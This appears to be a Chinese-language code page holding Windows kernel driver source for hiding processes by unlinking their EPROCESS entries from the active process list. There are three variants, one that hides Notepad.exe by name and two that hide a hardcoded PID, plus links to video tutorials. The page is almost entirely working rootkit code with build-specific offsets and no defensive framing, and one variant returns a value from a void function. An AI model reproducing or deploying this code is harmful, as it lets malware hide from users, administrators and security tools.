断链隐藏进程写法一

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#include <ntifs.h>



NTKERNELAPI CHAR* PsGetProcessImageFileName(PEPROCESS Process);
////传入进程名字通过遍历进程得到PEPROCESS
PEPROCESS GetProcessObjectByName(char* name)
{
	if (!name)return NULL;
	SIZE_T temp;
	for (temp = 100; temp < 10000; temp += 4)
	{
		NTSTATUS status;
		PEPROCESS ep;
		status = PsLookupProcessByProcessId((HANDLE)temp, &ep);
		if (NT_SUCCESS(status))
		{
			char* pn = PsGetProcessImageFileName(ep);
			if (_stricmp(pn, name) == 0)
				return ep;
		}
	}
	return NULL;
}

// 传入PLIST_ENTRY隐藏进程
VOID HidePProcessByList(PLIST_ENTRY ListEntry)
{
	if (!ListEntry)return;
	KIRQL OldIrql;
	OldIrql = KeRaiseIrqlToDpcLevel();
	if (ListEntry->Flink != ListEntry && ListEntry->Blink != ListEntry && ListEntry->Blink->Flink == ListEntry && ListEntry->Flink->Blink == ListEntry)
	{
		ListEntry->Flink->Blink = ListEntry->Blink;
		ListEntry->Blink->Flink = ListEntry->Flink;
		ListEntry->Flink = ListEntry;
		ListEntry->Blink = ListEntry;
	}
	KeLowerIrql(OldIrql);
}
#define PROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448
// 传入进程名隐藏进程
void HideProcess(char* name)
{
	if (!name)return;
	PEPROCESS PRoc = NULL;
	PRoc = GetProcessObjectByName(name);

	// 摘除结构中的C32Asm.exe实现驱动隐藏
	HidePProcessByList((PLIST_ENTRY)((ULONG64)PRoc + PROCESS_ACTIVE_PROCESS_LINKS_OFFSET));

}

static VOID UnDriver(PDRIVER_OBJECT pDriverObj)
{
	DbgPrint("[-] 驱动卸载 \n");
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT Driver, PUNICODE_STRING RegistryPath)
{
	DbgPrint("Hello  \n");

	HideProcess("Notepad.exe");
	Driver->DriverUnload = UnDriver;
	return STATUS_SUCCESS;
}

断链隐藏进程写法二三

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#include <ntifs.h>

#ifdef DBG
#define Log(x, ...) DbgPrintEx(0, 0, "qi:" x, __VA_ARGS__)
#else
#define Log(x, ...) DbgPrintEx(0, 0, "qi:" x, __VA_ARGS__)
#endif

NTSTATUS HideProcessA(ULONG ulPid);
void HideProcessB(unsigned long PID);


VOID DriverUnload(PDRIVER_OBJECT pDriverOBject)
{
	Log("Driver Unload Success!");

}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegPath)
{
	HideProcessA(0x4c0);
	//HideProcessB(0x4c0);
	pDriverObject->DriverUnload = DriverUnload;
	Log("Driver Load Success!");

	return STATUS_SUCCESS;
}

//断链隐藏进程
//https://www.bilibili.com/video/BV16K4y1U7e4/?spm_id_from=333.337.search-card.all.click&vd_source=5777815674b3f4e5c227299a8de61c9b
//
NTSTATUS HideProcessA(ULONG ulPid)
{
	if (ulPid == 0)return STATUS_UNSUCCESSFUL;
	DWORD_PTR pEprocess = NULL;
	ULONG ulProcessID = 0;
	pEprocess = (DWORD_PTR)PsGetCurrentProcess();
	PLIST_ENTRY pActiveProcessLinks = (LIST_ENTRY*)(pEprocess + 0x448);
	PLIST_ENTRY pNextLinks = pActiveProcessLinks->Flink;
	while (pNextLinks->Flink != pActiveProcessLinks->Flink)
	{
		pEprocess = ((DWORD_PTR)pNextLinks - 0x448);
		ulProcessID = *((ULONG*)(pEprocess + 0x440));
		if (ulProcessID == ulPid)
		{
			pNextLinks->Blink->Flink = pNextLinks->Flink;
			pNextLinks->Flink->Blink = pNextLinks->Blink;
		}
		pNextLinks = pNextLinks->Flink;
	}
	return STATUS_SUCCESS;

}

//【内核 进程遍隐藏 20】编写驱动程序实现简单进程隐藏 进程遍历
//https://www.bilibili.com/video/BV15o4y1N7xv/?spm_id_from=333.337.search-card.all.click&vd_source=5777815674b3f4e5c227299a8de61c9b
//
void HideProcessB(unsigned long PID)
{
	if (PID == 0)return STATUS_UNSUCCESSFUL;
	PEPROCESS process;
	NTSTATUS status = PsLookupProcessByProcessId((HANDLE)PID, &process);
	if (!NT_SUCCESS(status))
		return;
	LIST_ENTRY* entry = (LIST_ENTRY*)((LONG_PTR)process + 0x448);
	RemoveEntryList(entry);
	ObDereferenceObject(process);
}